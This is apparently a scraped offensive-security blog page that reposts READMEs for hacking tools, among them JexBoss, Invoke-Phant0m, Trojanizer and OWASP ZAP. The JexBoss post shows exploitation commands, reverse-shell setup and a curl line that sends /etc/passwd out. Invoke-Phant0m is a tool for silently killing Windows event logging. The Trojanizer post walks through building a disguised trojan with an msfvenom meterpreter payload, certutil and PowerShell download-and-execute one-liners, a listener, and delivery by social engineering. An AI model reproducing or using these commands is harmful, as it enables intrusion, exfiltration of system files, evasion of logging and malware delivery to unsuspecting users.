Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Saturday, January 27, 2018

JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool - JexBoss

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Requirements

Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, run the Git for Windows and type the following commands:
    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Features
The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
  • Servlet Deserialization
    • tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others

Videos
  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)


Screenshots
  • Simple usage examples:
$ python jexboss.py


  • Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080


  • Usage modes:
$ python jexboss.py -h
  • Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Results and recommendations:


Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
   jexremote=YOUR_IP:YOUR_PORT

   Example:
     Shell>jexremote=192.168.0.10:4444
  • Example:

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

Usage examples
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email protected]/etc/passwd http://your_server'
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • More Options:
optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                        PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates
                        performed by the webshell in exploited server at
                        http://webshell.jexboss.net/jsp_version.txt and 2)
                        check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP
                        parameters (eg. javax.faces.ViewState, oldFormData,
                        etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in
                        Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                        (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                        checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P
                        http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in
                        JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u
                        http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when
                        exploiting Java Deserialization Vulnerabilities in
                        application layer (for now, working only against *nix
                        systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                        @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$
                        (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized
                        objects into it. (egs. -H javax.faces.ViewState or -H
                        oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                        javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload
                        automatically. (DEFAULT: commons-collections3.1 or
                        groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized
                        object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in
                        -u parameter. This will send the payload in multiple
                        formats (eg. RAW, GZIPED and BASE64) and with
                        different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for
                        each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                        line)
  -out FILENAME_RESULTS
                        File name to store the file scan results


Share:

Thursday, January 25, 2018

Security Oriented GNU/Linux Distribution - Parrot Security 3.10


Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.

It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own softwares or protect your privacy with anonymity and crypto tools.

Details

Security

Parrot Security includes a full arsenal of security oriented tools to perform penetration tests, security audits and more. With a Parrot usb drive in your pocket you will always be sure to have all you need with you.

Privacy

Parrot includes by default TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, luks and many other tecnologies designed to defend your privacy and your identity.

Development

If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you as it includes a full development-oriented environment with some powerful editors and IDEs pre-installed and many other tools installable from our repository.

Features

System Specs
  • Debian GNU/Linux 9 (stretch)
  • Custom hardened Linux 4.8 kernel
  • Rolling release updates
  • Powerful worldwide mirror servers
  • High hardware compatibility
  • Community-driven development
  • free(libre) and open source project

Cryptography

Parrot includes many cryptographic softwares which are extremely useful when it comes to protect your confidential data and defend your privacy.

Parrot includes several cryptographic front-ends to work both with symmetric and asymmetric encryption, infact it natively supports volumes encryption with LUKS, TrueCrypt, VeraCrypt and the hidden TrueCrypt/VeraCrypt volumes with nested algorythms support.

The whole system can be installed inside an encrypted partition to protect your computer in case of theft.

Another swiss army knife of your privacy is GPG, the GNU Privacy Guard, an extremely powerful PGP software that lets you create a private/public pair of keys to apply digital signatures to your messages and to allow other people to send you encrypted messages that only your private key can decrypt, in can also handle multiple identities and subkeys, and its power resides in its ring of trust as PGP users can sign each other's keys to make other people know if a digital identity is valid or not.

Even our software repository is digitally signed by GPG, and the system automatically verifies if an update was altered or compromised and it refuses to upgrade or to install new software if our digital signature is not found or not valid.

Privacy

Your privacy is the most valuable thing you have in your digital life and the whole Parrot Team is exaggeratedly paranoid when it comes to users privacy, infact our system doesn't contain tracking systems, and it is hardened in deep to protect users from prying eyes.

Parrot has developed and implemented several tricks and softwares to achieve this goal, and AnonSurf is one of the most important examples, it is a software designed to start TOR and hijack all the internet traffic made by the system through the TOR network, we have also modified the system to make it use DNS servers different from those offered by your internet provider.

Parrot also includes torbrowser, torchat and other anonymous services, like I2P, a powerful alternative to TOR.

Programming

The main goal of an environment designed by hackers for hackers is the possibility to change it, adapt it, transform it and use it as a development platform to create new things, this is why Parrot comes out of the box with several tools for developers such as compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.

Parrot includes QTCreator as its main C, C++ and Qt framework. Another very useful tool is Geany, a lightweight and simple IDE which supports a huge amount of programming languages, while we also include Atom, the opensource editor of the future developed by GitHub, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.


And of course many other editors, development softwares and libraries are available through our software repository where we keep all the development tools always updated to their most cutting edge but reliable version.

Changelog

The first big news is the introduction of a full firejail+apparmor sandboxing system to proactively protect the OS by isolating its components with the combination of different tecniques. The first experiments were already introduced in Parrot 3.9 with the inclusion of firejail.

In Parrot 3.10 also introduced the new Firefox 57 (Quantum) that landed on Parrot very naturally with a complete browser restyle.


The other big news is the introduction of the latest Linux 4.14 kernel, and it is a very important improvement for us because of the awesome features of this new kernel release and its improved hardware support.

Some pentest tools received some important upstream updates, like metasploit-framework, that reached its 4.21 version, or maltegoce and casefile that were merged into a unique launcher provided by the new maltego 4.1.

To upgrade the system, open a terminal window and type the following command
sudo apt update && sudo apt full-upgrade


Share:

Windows Event Log Killer - Invoke-Phant0m


This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
I have made this script for two reasons. First, This script will help to Red Teams and Penetration Testers. Second, I want to learn Powershell and Low-Level things on Powershell for cyber security field.

Usage
PS C:\> Invoke-Phant0m
        _                 _    ___
  _ __ | |__   __ _ _ __ | |_ / _ \ _ __ ___
 | '_ \| '_ \ / _` | '_ \| __| | | | '_ ` _ \
 | |_) | | | | (_| | | | | |_| |_| | | | | | |
 | .__/|_| |_|\__,_|_| |_|\__|\___/|_| |_| |_|
 |_|


[!] I'm here to blur the line between life and death...

[*] Enumerating threads of PID: 1000...
[*] Parsing Event Log Service Threads...
[+] Thread 1001 Succesfully Killed!
[+] Thread 1002 Succesfully Killed!
[+] Thread 1003 Succesfully Killed!
[+] Thread 1004 Succesfully Killed!

[+] All done, you are ready to go!

Technical Details
https://artofpwn.com/phant0m-killing-windows-event-log.html

Video


Share:

Penetration Testing and Auditing Toolkit for Android Apps - AndroTickler



A java tool that helps to pentest Android apps faster, more easily and more efficiently. AndroTickler offers many features of information gathering, static and dynamic checks that cover most of the aspects of Android apps pentesting. It also offers several features that pentesters need during their pentests. AndroTickler also integrates with Frida to provide method tracing and manipulation. It was previously published under the name of Tickler.


AndroTickler requires a linux host and a rooted Android device connected to its USB port. The tool does not install anything on the Android device, it only creates a Tickler directory on /sdcard . AndroTickler depends on Android SDK to run commands on the device and copy app's data to TicklerWorkspace directory on the host for further analysis. TicklerWorkspace is the working directory of AndroTickler and each app has a separate subdirectory in TicklerWorkspace which can contain the following (depending on user actions):
  • DataDir directory: a copy of the data directory of the app
  • extracted directory: Output of apktool on the app, contains smali code, resources, libraries...etc.
  • bgSnapshots directory: Contains background snapshots copied from the device.
  • images directory: contains any screenshots taken for the app.
  • JavaCode directory: Contains app's Java code decompiled by dex2jar and JD tools
  • logs directory: contains log files produced by -t -log, as explained below
  • transfers: files and directories copied from the device to the host using -copy2host
  • AndroidManifest.xml: The manifest file of the app as per apktool
  • base.apk: the APK file of the app, installed on the device
  • debuggable.apk: a debuggable version of the app, produced by -dbg
libs directory and Tickler.conf configuration file exist in the same directory of the jar file. The configuration file sets the location of TicklerDir directory on the host and Tickler on /sdcard of the android device. If the configuration file does not exist or these 2 directories are not set, then default values will be used (Tickler_workspace on the current directory and /sdcard/Tickler respectively). Tickler_lib directory contains some Java libraries and external tools used by AndroTickler such as apktool and dex2jar.
AndroTickler highly depends on the following tools, so they should exist on your machine before using it:
  • Java 7 or higher
  • Android SDK tools (adb and friends)
  • sqlite3
Other tools are required for some features, but AndroTickler can still run without them:
  • Frida
  • jarsigner

How to use it
  1. Build tool from code
  2. Move AndroTickler.jar is to the same directory as Tickler_lib directory and Tickler.conf file (automatically created in build/libs)
  3. Connect your Android device with the application-to-test installed on

Install
curl -s "https://get.sdkman.io" | bash
source "$HOME/.sdkman/bin/sdkman-init.sh"
sdk install gradle 4.4
git clone https://github.com/ernw/AndroTickler
cd AndroTickler
gradle build

The current version does the following:
Command help
java -jar AndroTickler.jar -h

Information gathering/Static analysis:
List installed Apps on the device:
java -jar AndroTickler.jar -pkgs
Searches for an app (package) installed on the device, whose package name contains the searchKey
java -jar AndroTickler.jar -findPkg <searchKey>

package without extra attributes
java -jar AndroTickler.jar -pkg <package> [other options]
Any command with a -pkg option (whether used with any of the following options or not), does the following actions if they have not been done before:
  • Copies the app from the device
  • Extracts the Manifest file of the app
  • Decompiles the app to Java code using dex2jar and JD tools

General Info
java -jar AndroTickler.jar -pkg <package> -info
Returns the following information:
  • App's user ID
  • App's Directories path
  • If the app's code indicate usage of external storage
  • App's directories that already exist in External storage
  • Content URIs in the code
  • If the app is backable
  • If the app is debuggable
  • Data schemes (like iOS IPC)
  • The permissions it uses

Code Squeezing
java -jar AndroTickler.jar -pkg <package> -squeeze [short | <codeLocation> ]
Fetches the following from the decompiled Java code of the app:
  • Log messages
  • Any indication of possible user credentials
  • Java comments
  • Used libs
  • URLs in code
  • Usage of shared preferences
  • Usage of external storage
  • Common components such as OkHttp and WebView
Unsurprisingly, its output is usually huge, so it is recommended to redirect the command's output to a file
short Squeezes only the decompiled code that belongs to the developer. For example, if an app has a package name of com.notEnaf.myapp, then squeeze short squeezes only the code in com/notEnaf directory.
Squeezes the code only in codeLocation directory. Helpful to limit your search or squeeze the source code if available.

Listing Components
java -jar AndroTickler.jar -pkg <package> -l [-exp] [-v]
Lists all components of the app
-exp Shows only exported components
-v Gives more detailed information for each component:
  • Component type
  • Whether exported or not
  • Its intent filters
  • The tool checks the corresponding Java class to each component and returns all possible intent extras

Listing any kind of components
java -jar AndroTickler.jar -pkg <package> -l [-act | -ser | -rec | -prov ] [-exp] [-v]
  • -act : activities
  • -ser : services
  • -rec: broadcast receivers
  • -prov: Content providers
  • -exp: show only exported components of any of the above type

Databases
java -jar AndroTickler.jar -pkg <package> -db [|e|l|d] [nu]
By default, all -db commands update the app's data storage directory on the host before running the check.
no attribute OR e Tests whether the databases of the app are encrypted. It is the default action in case no option is given after -db flag. l Lists all databases of the app. Encrypted databases might not be detected. d Takes a sqlite dump of any of the unencrypted databases. nu noUpdate: runs any of the above options without updating the app's data directory on the host.

Data Storage Directory Comparison
java -jar AndroTickler.jar -pkg <package> -diff [d|detailed]
Copies the data storage directory of the app (to DataDirOld) then asks the user to do the action he wants and to press Enter when he's done. Then it copies the data storage directory again (to DataDir) and runs diff between them to show which files got added, deleted or modified.
d|detailed Does the same as the normal -diff command, also shows what exactly changed in text files and unencrypted databases.

Search

Code
java -jar AndroTickler.jar -pkg <package> -sc <key> [<customLocation>]
Searches for the key in the following locations:
  • The decompiled Java code of the app
  • res/values/strings.xml
  • res/values/arrays.xml
Search is case insensitive.
Replaces the decompiled Java code location with the custom location.

Storage
java -jar AndroTickler.jar -pkg <package> -sd <key>
Searches the Data storage directory of the app for the given key

Tickling
Triggers components of the app, by all possible combinations of intents. For example, if an activity has an intent-filter of 2 possible actions and 3 data URI schemes, then AndroTickler will trigger this activity with all possible combinations of this intent. Additionally, AndroTickler captures the intent extras mentioned in the Java class corresponding to the component, assign them dummy values and add them to the possible intent combinations. Only extras of type boolean, string, int and float are supported.
if the -exp option is used, then the components will be triggered without root privileges or any special permissions. If not, then the components will be trigged with root privileges. This helps to test the app in 2 different scenarios: against normal-privileged or high-privileged attackers.
Before triggering components, AndroTickler prints all the commands to be executed. Then for each command, it triggers the component, prints the command then waits for the user. This gives the user enough time to do any extra checks after the command's execution. Before the user moves on to the next command, he's given the option to capture a screenshot of the device for PoC documentation.
java -jar AndroTickler.jar -pkg <package> -t [-all | -exp] [target] [-log]
target as explained with list command, can be:
  • -act : activities. starts the (activity/activities) with all intent combinations as explained above
  • -ser : services. starts the service(s) with all intent combinations as explained above
  • -rec: broadcast receivers: sends all possible broadcast messages that would match the broadcast receiver(s)
  • -prov: Content providers: queries the content provider(s)
if no value, then the target is all of the above
[-comp] <component_name> Specifies one component only. You can also use <component_name> directly without -comp flag. -exp AndroTickler uses normal privileges to trigger only the exported targets. -all The default option. AndroTickler uses root privileges to trigger the exported targets -log Captures all logcat messages generated during the triggering session. Log file is saved in logs subdirectory.

Frida:
Frida should be installed on your host machine. Also the location of Frida server on the Android device should be added to Tickler.conf file in the Frida_server_path entry

Capture Arguments and return value
java -jar AndroTickler.jar -pkg <package> -frida vals <ClassName> <MethodName> <NumberOfArgs> [-reuse]
Displays arguments and return value of this method (only primitive datatypes and String)
reuse In case of vals and set options, Frida creates/updates a Frida script of that functionality. You can modify the created script as you want, then if you want to run it through AndroTickler, then use -reuse option so that it doesn't get overridden.

Modify Arguments or Return Value
java -jar AndroTickler.jar -pkg <package> -frida set <ClassName> <MethodName> <NumberOfArgs> <NumberOfArgToModify> <newValue>[-reuse]
Sets the argument number NumberOfArgToModify to newValue (only primitive datatypes and String) If NumberOfArgToModify > NumberOfArgs: sets the return value

Run JS Frida script
java -jar AndroTickler.jar -pkg <package> -frida script <scriptPath>
Runs a frida JS script located at scriptPath on your host
Enumerate loaded classes:
java -jar AndroTickler.jar -pkg <package> -frida enum

Other Features

Debuggable version
java -jar AndroTickler.jar -pkg <package> -dbg
Creates a debuggable version of the app, which can be installed on the device and debugged using any external tool. AndroTickler comes with a keystore to sign the debuggable apk, but it requires jarsigner tool on the host.

Custom version
java -jar AndroTickler.jar -pkg <package> -apk <decompiledDirectory>
Builds an apk file from a directory, signs it and installs it.

Background Snapshots
java -jar AndroTickler.jar [-pkg <package>] [-bg|--bgSnapshots]
Copies the background snapshots taken by the device (works with and without -pkg option) to bgSnapshots subdirectory.

Copy files / directories
Copy Data storage directory:
java -jar AndroTickler.jar -pkg <package> -dataDir  [dest]
Copies Data storage directory to DataDir dest Optional name of the destination directory, which will be located anyway at transfers sudirectory.
Copy any file / directory:
java -jar AndroTickler.jar -pkg <package> -cp2host <source_path> [dest]
Copies files / directories from the android devices.
  • source_path is the absolute location of what you want to copy from the android device
  • dest: optional name of the destination directory, which will be located anyway at transfers sudirectory.
If dest option is not given then the directory's name will be the timestamp of the transaction.

Screenshot
java -jar AndroTickler.jar [-pkg <package>] -screen
  • Captures the current screenshot of the device and saves them in images subdirectory
  • Works with or without the package flag

Note
For the options that do not require -pkg option, their data will be saved at Tickler_Dir/NoPackage

Examples:
java -jar AndroTickler.jar -pkg <package> -t  -act -exp
Triggers exported activities
java -jar AndroTickler.jar -pkg <package> -t -prov -log
Queries all content providers and saves logcat messages until the tool stops execution
java -jar AndroTickler.jar -pkg <package> -t <component_name> 
Triggers the component, type of triggering depends on the type of the component




Share:

Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 


-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 


single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)



xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)




Share:

Sunday, January 21, 2018

Penetration Testing Tool for Testing Web Applications - OWASP ZAP 2.7.0


The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. Its also a great tool for experienced pentesters to use for manual security testing.

For general information about ZAP:
  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License
For help using ZAP:
Information about the official ZAP Jenkins plugin:
To learn more about ZAP development:


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition